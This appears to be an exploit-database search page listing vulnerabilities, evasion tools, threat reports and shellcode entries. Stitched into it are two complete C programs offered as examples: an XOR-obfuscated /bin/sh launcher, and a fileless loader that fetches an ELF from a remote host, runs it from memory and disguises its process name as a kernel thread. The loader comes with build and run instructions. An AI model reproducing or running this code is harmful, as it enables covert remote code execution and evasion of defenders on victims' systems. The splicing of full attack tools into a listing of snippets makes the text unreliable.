7257 matches found

CNNVD · added 2024/01/16 12:00 a.m. · 3 views

Sandsprite scdbg Security Vulnerability

scdbg is Sandsprite's open-source, multi-platform shellcode emulation and analysis tool. A security vulnerability exists in Sandsprite scdbg version 1.0 that stems from uncontrolled resource consumption in Scdbg.exe, allowing an attacker to send a...

CVSS 5.5 · AI score 6.7 · EPSS 0.00059
Exploits 0 · References 2
Positive Technologies · added 2024/01/16 12:00 a.m. · 2 views

PT-2024-15665 · Sandsprite · Scdbg.Exe

Name of the Vulnerable Software and Affected Versions: Sandsprite Scdbg.exe version 1.0. Description: an Uncontrolled Resource Consumption issue has been found that allows an attacker to send a specially crafted shellcode payload to the "/foff" parameter, causing an application shutdown. A malware...

CVSS 5.5 · AI score 5.3 · EPSS 0.00059
Exploits 0 · References 7
Kitploit · added 2023/12/27 11:30 a.m. · 36 views

BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes

Little AV/EDR Evasion Lab for training & learning purposes. Under construction. [ASCII-art banner omitted]...

AI score 7.6
Exploits 0 · References 2
The Hacker News · added 2023/12/25 7:47 a.m. · 86 views

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor referred to as Cloud Atlas has been linked to a set of spear-phishing attacks on Russian enterprises. Targets included a Russian agro-industrial enterprise and a state-owned research company, according to a report from F.A.C.C.T., a standalone cybersecurity company formed after...

CVSS 9.3 · AI score 7.7 · EPSS 0.94354
Exploits 33
Kitploit · added 2023/12/22 11:30 a.m. · 14 views

ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable's Section

A variation of ProcessOverwriting to execute shellcode on an executable's section. What is it: for a more detailed explanation you can read my blog post. Process Stomping is a variation of hasherezade's Process Overwriting and has the advantage of writing a shellcode payload on a targeted sectio...

AI score 7.4
Exploits 0 · References 3
Talos Blog · added 2023/11/17 1:1 p.m. · 32 views

A deep dive into Phobos ransomware, recently deployed by 8Base group

Cisco Talos has recently observed an increase in activity conducted by 8Base, a ransomware group that uses a variant of the Phobos ransomware and other publicly available tools to facilitate their operations. Most of the group's Phobos variants are distributed by SmokeLoader, a backdoor trojan. Th...

AI score 7.4
Exploits 0
0day.today · added 2023/11/09 12:00 a.m. · 407 views

Linux/x64 - create a shell with execve() sending argument using XOR (/bin//sh) Shellcode (55 bytes)

Exploit Title: Linux/x64 - create a shell with execve() sending argument using XOR (/bin//sh), 55 bytes. Shellcode Author: Alexys (0x177git). Tested on: Linux x86_64. Shellcode Description: creates a new process with the execve syscall, passing /bin//sh as the argument; the argument is encrypted with a QWORD-sized XOR operation...

AI score 7.4
Exploits 0
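The XOR trick in this entry, worked through in C as an added example (this is not the 0day.today shellcode itself): "/bin//sh" is packed into a single QWORD, a QWORD key is chosen so that neither the key nor the encoded immediate contains a NUL byte, and the decode hands the recovered path to execve. The repeated-byte key search and the starting byte 0x11 are assumptions made here for illustration; the original's key is not reproduced.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* "/bin//sh" packed little-endian into one QWORD. The doubled slash pads the
   path to exactly 8 bytes, so one 64-bit register holds it with no NUL. */
#define SH_QWORD 0x68732f2f6e69622fULL

/* True if any of the 8 bytes is zero. A NUL in the payload truncates it when
   it is delivered through a string-copy style bug, so both the key and the
   encoded immediate (mov imm64 operands in the stub) must be NUL-free. */
bool qword_has_null(uint64_t v) {
    for (int i = 0; i < 8; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return true;
    return false;
}

uint64_t xor_qword(uint64_t v, uint64_t key) { return v ^ key; }

/* A key is usable only if it and the encoded path are both NUL-free. */
bool key_is_usable(uint64_t key) {
    return !qword_has_null(key) && !qword_has_null(xor_qword(SH_QWORD, key));
}

/* Assumption for this example: search keys made of one repeated byte,
   starting at `from`. Returns 0 (never usable) if none is found. */
uint64_t find_repeated_byte_key(unsigned from) {
    for (unsigned b = from ? from : 1; b <= 0xffu; b++) {
        uint64_t key = 0x0101010101010101ULL * b;
        if (key_is_usable(key)) return key;
    }
    return 0;
}

/* What the decoder stub does at run time: XOR the immediate back and use the
   register's bytes as the NUL-terminated path for execve. */
void decode_path(uint64_t encoded, uint64_t key, char out[9]) {
    uint64_t v = xor_qword(encoded, key);
    memcpy(out, &v, 8);   /* little-endian host assumed, as on x86-64 */
    out[8] = '\0';        /* the stub pushes a zero before the QWORD */
}

int main(void) {
    uint64_t key = find_repeated_byte_key(0x11);
    uint64_t enc = xor_qword(SH_QWORD, key);
    printf("key=0x%016llx encoded=0x%016llx\n",
           (unsigned long long)key, (unsigned long long)enc);
    char path[9];
    decode_path(enc, key, path);
    char *const argv[] = { path, NULL };
    execve(path, argv, NULL);   /* spawns /bin//sh if decoding was correct */
    return 1;
}
```

The NUL check is the part that matters when adapting the key: the encoded string is what ends up in the payload, so a key that is itself NUL-free can still produce a zero byte after XOR (0x2f... against the leading '/' does exactly that). Encoding hides the literal /bin/sh from naive string scans; the decode stub itself is what signatures and emulators such as scdbg key on.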
Kitploit · added 2023/11/07 11:30 a.m. · 26 views

Dvenom - Tool That Provides An Encryption Wrapper And Loader For Your Shellcode

Double Venom (DVenom) is a tool that helps red teamers bypass AV products by providing an encryption wrapper and loader for your shellcode. Capable of bypassing some well-known antivirus (AV) products. Offers multiple encryption methods including RC4, AES256, XOR, and ROT. Produces source code in C, Rust, PowerShell...

AI score 7.3
Exploits 0 · References 2
Securelist · added 2023/10/27 6:00 a.m. · 38 views

A cascade of compromise: unveiling Lazarus' new campaign

Earlier this year, a software vendor was compromised by Lazarus malware delivered through unpatched legitimate software. What's remarkable is that these software vulnerabilities were not new, and despite warnings and patches from the vendor, many of the vendor's systems continued to use the...

AI score 7.5
Exploits 0
Kitploit · added 2023/10/12 6:55 p.m. · 24 views

RecycledInjector - Native Syscalls Shellcode Injector

Currently fully undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is in turn based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails. To remain stealthy and keep entropy on the final...

AI score 7.3
Exploits 0 · References 4
Kitploit · added 2023/10/04 11:30 a.m. · 23 views

ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

ModuleShifting is a stealthier variation of the Module Stomping and Module Overloading injection techniques. It is implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the use of compiled loaders. The technique can be used...

AI score 7.4
Exploits 0 · References 11
Hive Pro Threat Advisories · added 2023/09/21 7:21 a.m. · 30 views

HTTPSnoop and PipeSnoop Malware Target Telecoms in the Middle East

Threat Level: Attack Report. Summary: HTTPSnoop and PipeSnoop malware targeting Middle East telecom providers, part of the ShroudedSnooper intrusion set, masquerading as legitimate components while executing shellcode via HTTP and IPC pipes,...

AI score 7
Exploits 0
Malwarebytes · added 2023/09/12 4:00 a.m. · 13 views

Microsoft Teams used to deliver DarkGate Loader malware

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But...

AI score 7.3
Exploits 0
0day.today · added 2023/09/11 12:00 a.m. · 312 views

Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)

Python generator script (imports ctypes, struct, argparse and keystone). Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes). Exploit Author: Senzee. Date: 08/29/2023. Platform: Windows x64. Tested on: Windows 11 Home / Windows Server 2022 Standard / Windows Server 2019 Datacenter. OS Versi...

AI score 7.1
Exploits 0
Packet Storm · added 2023/09/05 12:00 a.m. · 291 views

Freefloat FTP Server 1.0 Buffer Overflow

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow. Date: 08/22/2023. Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN). Vendor Homepage: http://www.freefoat.com. Version: 1.0. Tested on: Windows XP SP3. Python exploit (#!/usr/bin/python, import socket); Metasploit shellcode generated with msfvenom -p...

AI score 7.1
Exploits 0
0day.today · added 2023/09/04 12:00 a.m. · 232 views

Freefloat FTP Server 1.0 - (PWD) Remote Buffer Overflow Exploit

Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow. Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN). Vendor Homepage: http://www.freefoat.com. Version: 1.0. Tested on: Windows XP SP3. Python exploit (#!/usr/bin/python, import socket); Metasploit shellcode generated with msfvenom -p windows/shell_reverse_tcp...

AI score 7.4
Exploits 0
ATTACKERKB · added 2023/08/21 5:15 p.m. · 2 views

CVE-2023-31447

userlogin.cgi on Draytek Vigor2620 devices before 3.9.8.4 and on all versions of Vigor2925 devices allows attackers to send a crafted payload to modify the content of the code segment, insert shellcode, and execute arbitrary code...

CVSS 9.8 · AI score 7.7 · EPSS 0.00609
Exploits 0 · References 3
Prion · added 2023/08/21 5:15 p.m. · 22 views

Code injection

userlogin.cgi on Draytek Vigor2620 devices before 3.9.8.4 and on all versions of Vigor2925 devices allows attackers to send a crafted payload to modify the content of the code segment, insert shellcode, and execute arbitrary code...

CVSS 7.5 · AI score 9.4 · EPSS 0.00609
Exploits 0 · References 2 · Affected Software 1
CNNVD · added 2023/08/21 12:00 a.m. · 3 views

Draytek Vigor2620 Security Vulnerability

The DrayTek Vigor2620 is a wireless router from Taiwan-based DrayTek. A security vulnerability exists in the Draytek Vigor2620 prior to version 3.9.8.4; it originates in userlogin.cgi and allows an attacker to send a crafted payload that modifies the contents of the code segment, inserts...

CVSS 9.8 · AI score 8.6 · EPSS 0.00609
Exploits 0 · References 3
0day.today · added 2023/08/21 12:00 a.m. · 284 views

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)

Shellcode Title: Linux/x64 - memfd_create ELF loader (170 bytes). Shellcode Authors: Ivan Nikolsky (enty8080) & Tomas Globis (tomasglgg). Tested on: Linux x86_64. Shellcode Description: this shellcode attempts to establish a reverse TCP connection, reads the ELF length, reads the ELF and maps it into memory, creat...

AI score 7.4
Exploits 0
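The three stages this snippet describes (connect back, receive the ELF, run it from memory) written out in C as an added example; this is not the 170-byte shellcode from the entry. Assumptions made here: the peer sends a 4-byte little-endian length before the image (the snippet says a length is read but not how it is encoded), images over 64 MiB are refused, and the argv[0] given to the executed image is a constructed name. memfd_create is invoked through syscall(2) so the example also builds against libcs that lack the wrapper.

```c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

extern char **environ;

#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC 1U
#endif

/* memfd_create(2) via raw syscall: the same thing the shellcode does. */
static int memfd_create_raw(const char *name, unsigned int flags) {
    return (int)syscall(SYS_memfd_create, name, flags);
}

/* read(2) until exactly n bytes arrive; -1 on early EOF or error. */
ssize_t read_full(int fd, void *buf, size_t n) {
    size_t got = 0;
    while (got < n) {
        ssize_t r = read(fd, (char *)buf + got, n - got);
        if (r == 0) return -1;
        if (r < 0) { if (errno == EINTR) continue; return -1; }
        got += (size_t)r;
    }
    return (ssize_t)got;
}

ssize_t write_full(int fd, const void *buf, size_t n) {
    size_t done = 0;
    while (done < n) {
        ssize_t w = write(fd, (const char *)buf + done, n - done);
        if (w < 0) { if (errno == EINTR) continue; return -1; }
        done += (size_t)w;
    }
    return (ssize_t)done;
}

/* Stage 1 (framing is an assumption of this example): a 4-byte little-endian
   length, then the ELF image. Returns a malloc'd buffer or NULL. */
uint8_t *recv_elf(int fd, uint32_t *len) {
    uint8_t hdr[4];
    if (read_full(fd, hdr, 4) != 4) return NULL;
    uint32_t n = (uint32_t)hdr[0] | (uint32_t)hdr[1] << 8 |
                 (uint32_t)hdr[2] << 16 | (uint32_t)hdr[3] << 24;
    if (n == 0 || n > (64u << 20)) return NULL;   /* refuse absurd sizes */
    uint8_t *img = malloc(n);
    if (!img) return NULL;
    if (read_full(fd, img, n) != (ssize_t)n) { free(img); return NULL; }
    *len = n;
    return img;
}

/* Cheap sanity check before handing bytes to the kernel. */
bool looks_like_elf(const uint8_t *img, size_t len) {
    return len >= 4 && memcmp(img, "\x7f" "ELF", 4) == 0;
}

/* Stage 2: put the image in an anonymous, memory-backed file. */
int elf_to_memfd(const uint8_t *img, size_t len) {
    int mfd = memfd_create_raw("", MFD_CLOEXEC);
    if (mfd < 0) return -1;
    if (write_full(mfd, img, len) != (ssize_t)len) { close(mfd); return -1; }
    return mfd;
}

int main(int argc, char **argv) {
    if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); return 1; }
    int s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET,
                              .sin_port = htons((uint16_t)atoi(argv[2])) };
    if (s < 0 || inet_pton(AF_INET, argv[1], &sa.sin_addr) != 1 ||
        connect(s, (struct sockaddr *)&sa, sizeof sa) != 0) {
        perror("connect");
        return 1;
    }
    uint32_t len = 0;
    uint8_t *img = recv_elf(s, &len);
    if (!img || !looks_like_elf(img, len)) { fprintf(stderr, "bad image\n"); return 1; }
    int mfd = elf_to_memfd(img, len);
    free(img);
    if (mfd < 0) { perror("memfd"); return 1; }
    /* Stage 3: execute straight from the descriptor; nothing touches disk. */
    char *const av[] = { "[kworker/0:1]", NULL };   /* constructed argv[0] */
    fexecve(mfd, av, environ);
    perror("fexecve");
    return 1;
}
```

Build with `gcc -O2 -o loader loader.c` and run `./loader <host> <port>` against a listener that sends the length-prefixed image. For responders, the give-away is on the process side: a binary run this way has /proc/<pid>/exe resolving to a `/memfd:... (deleted)` path and the same path in its memory maps, which is what fileless-ELF hunting rules look for.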